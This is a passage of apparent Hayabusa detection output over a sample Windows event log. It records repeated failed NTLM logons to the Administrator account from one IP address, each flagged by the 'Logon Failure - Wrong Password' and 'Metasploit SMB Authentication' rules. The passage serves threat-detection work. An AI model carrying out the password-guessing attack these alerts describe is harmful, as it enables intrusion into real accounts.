Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 